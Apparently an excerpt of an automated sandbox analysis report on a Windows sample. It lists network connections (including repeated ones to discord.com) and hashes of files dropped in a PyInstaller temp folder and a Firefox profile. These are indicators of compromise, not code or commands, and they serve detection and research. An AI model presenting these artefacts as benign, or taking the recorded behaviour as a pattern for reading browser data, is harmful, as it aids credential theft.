GB 142.250.178.14:443 encrypted-tbn0.gstatic.com tcp
GB 142.250.178.14:443 encrypted-tbn0.gstatic.com tcp
GB 142.250.178.14:443 encrypted-tbn0.gstatic.com tcp
GB 142.250.178.14:443 encrypted-tbn0.gstatic.com tcp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 encrypted-tbn0.gstatic.com udp
GB 142.250.178.14:443 encrypted-tbn0.gstatic.com udp
US 8.8.8.8:53 play.google.com udp
US 162.159.138.232:443 discord.com tcp
GB 172.217.169.46:443 play.google.com tcp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 play.google.com udp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 14.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 46.169.217.172.in-addr.arpa udp
GB 172.217.169.46:443 play.google.com udp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 id.google.com udp
FI 173.194.220.94:443 id.google.com tcp
US 8.8.8.8:53 id.google.com udp
US 8.8.8.8:53 id.google.com udp
US 8.8.8.8:53 i.ytimg.com udp
FI 173.194.220.94:443 id.google.com udp
FR 172.217.18.214:443 i.ytimg.com tcp
US 8.8.8.8:53 i.ytimg.com udp
FR 172.217.18.214:443 i.ytimg.com tcp
FR 172.217.18.214:443 i.ytimg.com udp
US 8.8.8.8:53 214.18.217.172.in-addr.arpa udp
US 8.8.8.8:53 94.220.194.173.in-addr.arpa udp
US 8.8.8.8:53 www.youtube.com udp
GB 216.58.201.110:443 www.youtube.com tcp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
GB 216.58.201.110:443 youtube-ui.l.google.com udp
GB 216.58.201.110:443 youtube-ui.l.google.com tcp
US 34.117.188.166:443 contile.services.mozilla.com tcp
US 34.160.144.191:443 content-signature-2.cdn.mozilla.net tcp
US 34.160.144.191:443 content-signature-2.cdn.mozilla.net tcp
US 162.159.138.232:443 discord.com tcp
GB 216.58.201.110:443 youtube-ui.l.google.com udp
FR 172.217.18.214:443 i.ytimg.com tcp
US 162.159.138.232:443 discord.com tcp
US 34.117.188.166:443 contile.services.mozilla.com udp
US 162.159.138.232:443 discord.com tcp
FR 172.217.18.214:443 i.ytimg.com tcp
US 8.8.8.8:53 110.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 166.188.117.34.in-addr.arpa udp
FR 172.217.18.214:443 i.ytimg.com udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.27.84:443 accounts.google.com tcp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 74.204.58.216.in-addr.arpa udp
NL 142.250.27.84:443 accounts.google.com tcp
US 8.8.8.8:53 accounts.google.com udp
US 162.159.138.232:443 discord.com tcp
NL 142.250.27.84:443 accounts.google.com udp
US 8.8.8.8:53 rr1---sn-aigzrnld.googlevideo.com udp
US 162.159.138.232:443 discord.com tcp
GB 74.125.97.70:443 rr1---sn-aigzrnld.googlevideo.com tcp
GB 74.125.97.70:443 rr1---sn-aigzrnld.googlevideo.com tcp
US 8.8.8.8:53 rr1.sn-aigzrnld.googlevideo.com udp
US 8.8.8.8:53 84.27.250.142.in-addr.arpa udp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 rr1.sn-aigzrnld.googlevideo.com udp
FR 172.217.20.196:443 www.google.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
FR 172.217.20.196:443 www.google.com udp
US 8.8.8.8:53 rr1---sn-aigzrnld.googlevideo.com udp
US 8.8.8.8:53 70.97.125.74.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI14522\python312.dll

MD5 3c388ce47c0d9117d2a50b3fa5ac981d
SHA1 038484ff7460d03d1d36c23f0de4874cbaea2c48
SHA256 c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb
SHA512 e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35

C:\Users\Admin\AppData\Local\Temp\_MEI14522\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

C:\Users\Admin\AppData\Local\Temp\_MEI14522\base_library.zip

MD5 8dad91add129dca41dd17a332a64d593
SHA1 70a4ec5a17ed63caf2407bd76dc116aca7765c0d
SHA256 8de4f013bfecb9431aabaa97bb084fb7de127b365b9478d6f7610959bf0d2783
SHA512 2163414bc01fc30d47d1de763a8332afe96ea7b296665b1a0840d5197b7e56f4963938e69de35cd2bf89158e5e2240a1650d00d86634ac2a5e2ad825455a2d50

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_ctypes.pyd

MD5 bbd5533fc875a4a075097a7c6aba865e
SHA1 ab91e62c6d02d211a1c0683cb6c5b0bdd17cbf00
SHA256 be9828a877e412b48d75addc4553d2d2a60ae762a3551f9731b50cae7d65b570
SHA512 23ef351941f459dee7ed2cebbae21969e97b61c0d877cfe15e401c36369d2a2491ca886be789b1a0c5066d6a8835fd06db28b5b28fb6e9df84c2d0b0d8e9850e

C:\Users\Admin\AppData\Local\Temp\_MEI14522\python3.DLL

MD5 79b02450d6ca4852165036c8d4eaed1f
SHA1 ce9ff1b302426d4c94a2d3ea81531d3cb9e583e4
SHA256 d2e348e615a5d3b08b0bac29b91f79b32f0c1d0be48976450042462466b51123
SHA512 47044d18db3a4dd58a93b43034f4fafa66821d157dcfefb85fca2122795f4591dc69a82eb2e0ebd9183075184368850e4caf9c9fea0cfe6f766c73a60ffdf416

\Users\Admin\AppData\Local\Temp\_MEI14522\libffi-8.dll

MD5 0f8e4992ca92baaf54cc0b43aaccce21
SHA1 c7300975df267b1d6adcbac0ac93fd7b1ab49bd2
SHA256 eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a
SHA512 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_lzma.pyd

MD5 05e8b2c429aff98b3ae6adc842fb56a3
SHA1 834ddbced68db4fe17c283ab63b2faa2e4163824
SHA256 a6e2a5bb7a33ad9054f178786a031a46ea560faeef1fb96259331500aae9154c
SHA512 badeb99795b89bc7c1f0c36becc7a0b2ce99ecfd6f6bb493bda24b8e57e6712e23f4c509c96a28bc05200910beddc9f1536416bbc922331cae698e813cbb50b3

C:\Users\Admin\AppData\Local\Temp\_MEI14522\VCRUNTIME140_1.dll

MD5 f8dfa78045620cf8a732e67d1b1eb53d
SHA1 ff9a604d8c99405bfdbbf4295825d3fcbc792704
SHA256 a113f192195f245f17389e6ecbed8005990bcb2476ddad33f7c4c6c86327afe5
SHA512 ba7f8b7ab0deb7a7113124c28092b543e216ca08d1cf158d9f40a326fb69f4a2511a41a59ea8482a10c9ec4ec8ac69b70dfe9ca65e525097d93b819d498da371

\Users\Admin\AppData\Local\Temp\_MEI14522\select.pyd

MD5 92b440ca45447ec33e884752e4c65b07
SHA1 5477e21bb511cc33c988140521a4f8c11a427bcc
SHA256 680df34fb908c49410ac5f68a8c05d92858acd111e62d1194d15bdce520bd6c3
SHA512 40e60e1d1445592c5e8eb352a4052db28b1739a29e16b884b0ba15917b058e66196988214ce473ba158704837b101a13195d5e48cb1dc2f07262dfecfe8d8191

\Users\Admin\AppData\Local\Temp\_MEI14522\_hashlib.pyd

MD5 eedb6d834d96a3dffffb1f65b5f7e5be
SHA1 ed6735cfdd0d1ec21c7568a9923eb377e54b308d
SHA256 79c4cde23397b9a35b54a3c2298b3c7a844454f4387cb0693f15e4facd227dd2
SHA512 527bd7bb2f4031416762595f4ce24cbc6254a50eaf2cc160b930950c4f2b3f5e245a486972148c535f8cd80c78ec6fa8c9a062085d60db8f23d4b21e8ae4c0ad

\Users\Admin\AppData\Local\Temp\_MEI14522\_queue.pyd

MD5 6e0cb85dc94e351474d7625f63e49b22
SHA1 66737402f76862eb2278e822b94e0d12dcb063c5
SHA256 3f57f29abd86d4dc8f4ca6c3f190ebb57d429143d98f0636ff5117e08ed81f9b
SHA512 1984b2fc7f9bbdf5ba66716fc60dcfd237f38e2680f2fc61f141ff7e865c0dbdd7cdc47b3bc490b426c6cfe9f3f9e340963abf428ea79eb794b0be7d13001f6a

\Users\Admin\AppData\Local\Temp\_MEI14522\libssl-3.dll

MD5 19a2aba25456181d5fb572d88ac0e73e
SHA1 656ca8cdfc9c3a6379536e2027e93408851483db
SHA256 2e9fbcd8f7fdc13a5179533239811456554f2b3aa2fb10e1b17be0df81c79006
SHA512 df17dc8a882363a6c5a1b78ba3cf448437d1118ccc4a6275cc7681551b13c1a4e0f94e30ffb94c3530b688b62bff1c03e57c2c185a7df2bf3e5737a06e114337

\Users\Admin\AppData\Local\Temp\_MEI14522\_ssl.pyd

MD5 5b9b3f978d07e5a9d701f832463fc29d
SHA1 0fcd7342772ad0797c9cb891bf17e6a10c2b155b
SHA256 d568b3c99bf0fc35a1f3c5f66b4a9d3b67e23a1d3cf0a4d30499d924d805f5aa
SHA512 e4db56c8e0e9ba0db7004463bf30364a4e4ab0b545fb09f40d2dba67b79b6b1c1db07df1f017501e074abd454d1e37a4167f29e7bbb0d4f8958fa0a2e9f4e405

\Users\Admin\AppData\Local\Temp\_MEI14522\libcrypto-3.dll

MD5 e547cf6d296a88f5b1c352c116df7c0c
SHA1 cafa14e0367f7c13ad140fd556f10f320a039783
SHA256 05fe080eab7fc535c51e10c1bd76a2f3e6217f9c91a25034774588881c3f99de
SHA512 9f42edf04c7af350a00fa4fdf92b8e2e6f47ab9d2d41491985b20cd0adde4f694253399f6a88f4bdd765c4f49792f25fb01e84ec03fd5d0be8bb61773d77d74d

\Users\Admin\AppData\Local\Temp\_MEI14522\_socket.pyd

MD5 dc06f8d5508be059eae9e29d5ba7e9ec
SHA1 d666c88979075d3b0c6fd3be7c595e83e0cb4e82
SHA256 7daff6aa3851a913ed97995702a5dfb8a27cb7cf00fb496597be777228d7564a
SHA512 57eb36bc1e9be20c85c34b0a535b2349cb13405d60e752016e23603c4648939f1150e4dbebc01ec7b43eb1a6947c182ccb8a806e7e72167ad2e9d98d1fd94ab3

\Users\Admin\AppData\Local\Temp\_MEI14522\_wmi.pyd

MD5 7ec3fc12c75268972078b1c50c133e9b
SHA1 73f9cf237fe773178a997ad8ec6cd3ac0757c71e
SHA256 1a105311a5ed88a31472b141b4b6daa388a1cd359fe705d9a7a4aba793c5749f
SHA512 441f18e8ce07498bc65575e1ae86c1636e1ceb126af937e2547710131376be7b4cb0792403409a81b5c6d897b239f26ec9f36388069e324249778a052746795e

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_uuid.pyd

MD5 353e11301ea38261e6b1cb261a81e0fe
SHA1 607c5ebe67e29eabc61978fb52e4ec23b9a3348e
SHA256 d132f754471bd8a6f6d7816453c2e542f250a4d8089b657392fe61a500ae7899
SHA512 fa990b3e9619d59ae3ad0aeffca7a3513ab143bfd0ac9277e711519010f7c453258a4b041be86a275f3c365e980fc857c23563f3b393d1e3a223973a673e88c5

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_sqlite3.pyd

MD5 29464d52ba96bb11dbdccbb7d1e067b4
SHA1 d6a288e68f54fb3f3b38769f271bf885fd30cbf6
SHA256 3e96cd9e8abbea5c6b11ee91301d147f3e416ac6c22eb53123eaeae51592d2fe
SHA512 3191980cdf4ab34e0d53ba18e609804c312348da5b79b7242366b9e3be7299564bc1ec08f549598041d434c9c5d27684349eff0eaa45f8fa66a02dd02f97862b

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_overlapped.pyd

MD5 ba368245d104b1e016d45e96a54dd9ce
SHA1 b79ef0eb9557a0c7fa78b11997de0bb057ab0c52
SHA256 67e6ca6f1645c6928ade6718db28aff1c49a192e8811732b5e99364991102615
SHA512 429d7a1f829be98c28e3dca5991edcadff17e91f050d50b608a52ef39f6f1c6b36ab71bfa8e3884167371a4e40348a8cda1a9492b125fb19d1a97c0ccb8f2c7b

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_multiprocessing.pyd

MD5 a4281e383ef82c482c8bda50504be04a
SHA1 4945a2998f9c9f8ce1c078395ffbedb29c715d5d
SHA256 467b0fef42d70b55abf41d817dff7631faeef84dce64f8aadb5690a22808d40c
SHA512 661e38b74f8bfdd14e48e65ee060da8ecdf67c0e3ca1b41b6b835339ab8259f55949c1f8685102fd950bf5de11a1b7c263da8a3a4b411f1f316376b8aa4a5683

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_decimal.pyd

MD5 3055edf761508190b576e9bf904003aa
SHA1 f0dc8d882b5cd7955cc6dfc8f9834f70a83c7890
SHA256 e4104e47399d3f635a14d649f61250e9fd37f7e65c81ffe11f099923f8532577
SHA512 87538fe20bd2c1150a8fefd0478ffd32e2a9c59d22290464bf5dfb917f6ac7ec874f8b1c70d643a4dc3dd32cbe17e7ea40c0be3ea9dd07039d94ab316f752248

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_cffi_backend.cp312-win_amd64.pyd

MD5 0572b13646141d0b1a5718e35549577c
SHA1 eeb40363c1f456c1c612d3c7e4923210eae4cdf7
SHA256 d8a76d1e31bbd62a482dea9115fc1a109cb39af4cf6d1323409175f3c93113a7
SHA512 67c28432ca8b389acc26e47eb8c4977fddd4af9214819f89df07fecbc8ed750d5f35807a1b195508dd1d77e2a7a9d7265049dcfbfe7665a7fd1ba45da1e4e842

C:\Users\Admin\AppData\Local\Temp\_MEI14522\_asyncio.pyd

MD5 28d2a0405be6de3d168f28109030130c
SHA1 7151eccbd204b7503f34088a279d654cfe2260c9
SHA256 2dfcaec25de17be21f91456256219578eae9a7aec5d21385dec53d0840cf0b8d
SHA512 b87f406f2556fac713967e5ae24729e827f2112c318e73fe8ba28946fd6161802de629780fad7a3303cf3dbab7999b15b535f174c85b3cbb7bb3c67915f3b8d0

C:\Users\Admin\AppData\Local\Temp\_MEI14522\unicodedata.pyd

MD5 16be9a6f941f1a2cb6b5fca766309b2c
SHA1 17b23ae0e6a11d5b8159c748073e36a936f3316a
SHA256 10ffd5207eeff5a836b330b237d766365d746c30e01abf0fd01f78548d1f1b04
SHA512 64b7ecc58ae7cf128f03a0d5d5428aaa0d4ad4ae7e7d19be0ea819bbbf99503836bfe4946df8ee3ab8a92331fdd002ab9a9de5146af3e86fef789ce46810796b

C:\Users\Admin\AppData\Local\Temp\_MEI14522\sqlite3.dll

MD5 612fc8a817c5faa9cb5e89b0d4096216
SHA1 c8189cbb846f9a77f1ae67f3bd6b71b6363b9562
SHA256 7da1c4604fc97ba033830a2703d92bb6d10a9bba201ec64d13d5ccbfecd57d49
SHA512 8a4a751af7611651d8d48a894c0d67eb67d5c22557ba4ddd298909dd4fb05f5d010fe785019af06e6ca2e406753342c54668e9c4e976baf758ee952834f8a237

C:\Users\Admin\AppData\Local\Temp\_MEI14522\pyexpat.pyd

MD5 5e911ca0010d5c9dce50c58b703e0d80
SHA1 89be290bebab337417c41bab06f43effb4799671
SHA256 4779e19ee0f4f0be953805efa1174e127f6e91ad023bd33ac7127fef35e9087b
SHA512 e3f1db80748333f08f79f735a457246e015c10b353e1a52abe91ed9a69f7de5efa5f78a2ed209e97b16813cb74a87f8f0c63a5f44c8b59583851922f54a48cf5

\Users\Admin\AppData\Local\Temp\_MEI14522\_bz2.pyd

MD5 223fd6748cae86e8c2d5618085c768ac
SHA1 dcb589f2265728fe97156814cbe6ff3303cd05d3
SHA256 f81dc49eac5ecc528e628175add2ff6bda695a93ea76671d7187155aa6326abb
SHA512 9c22c178417b82e68f71e5b7fe7c0c0a77184ee12bd0dc049373eace7fa66c89458164d124a9167ae760ff9d384b78ca91001e5c151a51ad80c824066b8ecce6

C:\Users\Admin\AppData\Local\Temp\_MEI14522\charset_normalizer\md.cp312-win_amd64.pyd

MD5 d9e0217a89d9b9d1d778f7e197e0c191
SHA1 ec692661fcc0b89e0c3bde1773a6168d285b4f0d
SHA256 ecf12e2c0a00c0ed4e2343ea956d78eed55e5a36ba49773633b2dfe7b04335c0
SHA512 3b788ac88c1f2d682c1721c61d223a529697c7e43280686b914467b3b39e7d6debaff4c0e2f42e9dddb28b522f37cb5a3011e91c66d911609c63509f9228133d

C:\Users\Admin\AppData\Local\Temp\_MEI14522\charset_normalizer\md__mypyc.cp312-win_amd64.pyd

MD5 bf9a9da1cf3c98346002648c3eae6dcf
SHA1 db16c09fdc1722631a7a9c465bfe173d94eb5d8b
SHA256 4107b1d6f11d842074a9f21323290bbe97e8eed4aa778fbc348ee09cc4fa4637
SHA512 7371407d12e632fc8fb031393838d36e6a1fe1e978ced36ff750d84e183cde6dd20f75074f4597742c9f8d6f87af12794c589d596a81b920c6c62ee2ba2e5654

C:\Users\Admin\AppData\Local\Temp\_MEI14522\certifi\cacert.pem

MD5 d3e74c9d33719c8ab162baa4ae743b27
SHA1 ee32f2ccd4bc56ca68441a02bf33e32dc6205c2b
SHA256 7a347ca8fef6e29f82b6e4785355a6635c17fa755e0940f65f15aa8fc7bd7f92
SHA512 e0fb35d6901a6debbf48a0655e2aa1040700eb5166e732ae2617e89ef5e6869e8ddd5c7875fa83f31d447d4abc3db14bffd29600c9af725d9b03f03363469b4c

C:\Users\Admin\AppData\Local\Temp\_MEI14522\Crypto\Cipher\_raw_ecb.pyd

MD5 fee13d4fb947835dbb62aca7eaff44ef
SHA1 7cc088ab68f90c563d1fe22d5e3c3f9e414efc04
SHA256 3e0d07bbf93e0748b42b1c2550f48f0d81597486038c22548224584ae178a543
SHA512 dea92f935bc710df6866e89cc6eb5b53fc7adf0f14f3d381b89d7869590a1b0b1f98f347664f7a19c6078e7aa3eb0f773ffcb711cc4275d0ecd54030d6cf5cb2

C:\Users\Admin\AppData\Local\Temp\_MEI14522\Crypto\Cipher\_raw_cbc.pyd

MD5 20708935fdd89b3eddeea27d4d0ea52a
SHA1 85a9fe2c7c5d97fd02b47327e431d88a1dc865f7
SHA256 11dd1b49f70db23617e84e08e709d4a9c86759d911a24ebddfb91c414cc7f375
SHA512 f28c31b425dc38b5e9ad87b95e8071997e4a6f444608e57867016178cd0ca3e9f73a4b7f2a0a704e45f75b7dcff54490510c6bf8461f3261f676e9294506d09b

C:\Users\Admin\AppData\Local\Temp\_MEI14522\Crypto\Cipher\_raw_cfb.pyd

MD5 43bbe5d04460bd5847000804234321a6
SHA1 3cae8c4982bbd73af26eb8c6413671425828dbb7
SHA256 faa41385d0db8d4ee2ee74ee540bc879cf2e884bee87655ff3c89c8c517eed45
SHA512 dbc60f1d11d63bebbab3c742fb827efbde6dff3c563ae1703892d5643d5906751db3815b97cbfb7da5fcd306017e4a1cdcc0cdd0e61adf20e0816f9c88fe2c9b

C:\Users\Admin\AppData\Local\Temp\_MEI14522\Crypto\Cipher\_raw_ofb.pyd

MD5 4d9182783ef19411ebd9f1f864a2ef2f
SHA1 ddc9f878b88e7b51b5f68a3f99a0857e362b0361
SHA256 c9f4c5ffcdd4f8814f8c07ce532a164ab699ae8cde737df02d6ecd7b5dd52dbd
SHA512 8f983984f0594c2cac447e9d75b86d6ec08ed1c789958afa835b0d1239fd4d7ebe16408d080e7fce17c379954609a93fc730b11be6f4a024e7d13d042b27f185

C:\Users\Admin\AppData\Local\Temp\_MEI14522\Crypto\Cipher\_raw_ctr.pyd

MD5 c6b20332b4814799e643badffd8df2cd
SHA1 e7da1c1f09f6ec9a84af0ab0616afea55a58e984
SHA256 61c7a532e108f67874ef2e17244358df19158f6142680f5b21032ba4889ac5d8
SHA512 d50c7f67d2dfb268ad4cf18e16159604b6e8a50ea4f0c9137e26619fd7835faad323b5f6a2b8e3ec1c023e0678bcbe5d0f867cd711c5cd405bd207212228b2b4

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\datareporting\glean\db\data.safe.bin

MD5 c27d96ff24908f1e2ab5886bec5a8951
SHA1 ad0f8887cd301c2c1d689479ec21348a5fe032ac
SHA256 829067ffb6507b5fdb6f11fbcc43f48485330528f004a1d06e36b31cc58f53ff
SHA512 3baa53cf21bf066e4f6ed0862ff2af9b403f44081aec8eacf9500dce91cdc398ff05fd879ef50a08c207fe6347aa1e3bfe7c6cc9b2a7a50b01ced6861b42b41d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\datareporting\glean\pending_pings\f1d286bc-478f-4dc5-940a-66210aecca90

MD5 785c5500899cefa9267a75fddd14f63f
SHA1 8e9a18ba441be6e49f1fe149565b1bba1f249245
SHA256 8091e304f4f36214e5803f420019b906af818a7afc9c0bd5efc9be6acabdb470
SHA512 7f11fa2ad1200dc1bbf890bb51cb72474c88e3a1e91acea81f5a23c8054b4b0c77d51b9608a80a3054773debe6d60ecb466b98636bc7a63b2651bcd1d4237fcf

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\datareporting\glean\pending_pings\1b27f736-116f-41f2-adb2-647564d79b78

MD5 154c72e6676dfddac1c3ef2bc3766c14
SHA1 5437def2450ca7ff4b98860b09bc0c626d954ab1
SHA256 5593605e26b45a4231caa0188166f7e0d469c5479887219a7b6054353a28ad3f
SHA512 cfd25a61331ffd8f33593773c86d873200bcb941a3f056e39179ed7a35b67066ad9d6c015a91eb98821c83d53b829f7d5b4ae9dc91edc3060693099f2caaf8cd

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\prefs.js

MD5 c90b8498e3c39547d9304ce1f69ad6d6
SHA1 a24ef99d4d13fce0166dc10ca00d778fcba6d1c1
SHA256 8ccf4be22c2555836b82c80bf3a076ffc172e7dbb088ee5fbd68ab61f2cc40ad
SHA512 3562df62a1c174b069040f1e7a9bd7dac71736c71568466baa41a1927c37e086c2ed7675df8c39fd760e25d0a40f2188a3f812bc9daefec6b534c100b5dee984

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\prefs-1.js

MD5 e9cd3dd63828b4b57dc6debe97e0af80
SHA1 7943380c98d24d33b48f8273a997d4cf1245b83c
SHA256 282d676d64841fff967ca18d2662ed91a0d979cb9b39809e3fa3a3b3dd4238b7
SHA512 ff288ceb1ba22f5d0cc6f5d7aaa3ab7fe28a9ffb8f4f6c0415f837eaeff12a75061593ab28f90cb86211b91335c2a047cfba22524eccbaf056a0f3b05075f7c4

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\sessionstore-backups\recovery.jsonlz4

MD5 50c218905872cbd44bdbbf49ad2bd29e
SHA1 652b5ca3ccbbb1a0fae691bd4977294a1ae478c9
SHA256 e1557d2d973e3489a6b9560856acda4ccf62c56e7324a48ffb6249531c89e8f5
SHA512 b9fb4442d3eeb3b4301a166cd06d0bc58d3563018de80dcd56ba38cf3091cc77186241eb231852a34edf6bf26fa3b6025f11087b23463501b818b68decc7c841

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\prefs.js

MD5 2d0fd71d9fd103c520da490d5adf1222
SHA1 f85b538c7a1027b078b296d6528e654df03688a8
SHA256 3acc3d178890de13ecb865056b2f931c7b51464bbcfc3d475bc4f7cddab591c8
SHA512 91ac55ee84353440ac63dae1557ae436fe3a6b6bb396418ca91d20daa1eca3e2bdf2d94bbf5ad5ed56dffd2c926fd90c0f9fa7fdb6d32a5367a654fa679e89ba

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\cache2\doomed\26113

MD5 0f77caa7dd3e60173d9d20da48f8b65e
SHA1 6515da7eb0724ef3921557ef397ba43cfc379fde
SHA256 63874638f2dc400240ef4ad0e9d7e318531773da1869f94f64ff9fb1e6652577
SHA512 77a165d49df795c25313a67f1d9928564052fb0bc22274d04e211117b82c3980e5fe1a922b691436bb6cf62774282d4e988e84a5f193de68eef709878e60fc59

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\storage\default\https+++www.youtube.com\cache\morgue\69\{880688a4-93df-43f1-9ccb-d770b767dc45}.final

MD5 2a252393b98be6348c4ba18003cc3471
SHA1 40f75302fcbe4a8ac2e33a8d9daf801abc2a9598
SHA256 04cae3c7b208fc55b25763913d0bbdc99232942086efdf705f2a27764be6f5ee
SHA512 07af4a7b0d10f1b5e1fe0877b21abc98483d78797608a1763cfb71e25559fdce10d20f03c16f4284d7ae7ab90266f45240425e3a264de9525ec1657345b85198

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\storage\default\https+++www.youtube.com\idb\788007792yCt7-%iCt7-%r0e3sdpfo.sqlite

MD5 ab336cb67d69555fff5600eec86ab564
SHA1 0b96b8bf897199caa0ee0aa981cdd68e3b68fecf
SHA256 1ba0a8f09d47dd740b2df1e77223bdf780564946735aaa77b63058561e569e32
SHA512 8648f5074cb8f455252eec1cc923a1951130355b95cdf8a2517db5487c509dbb7b1ec9a33daea0e3f966f45cfdb36c7cf7f31d84f65fa421a2e6edc65ffc0da5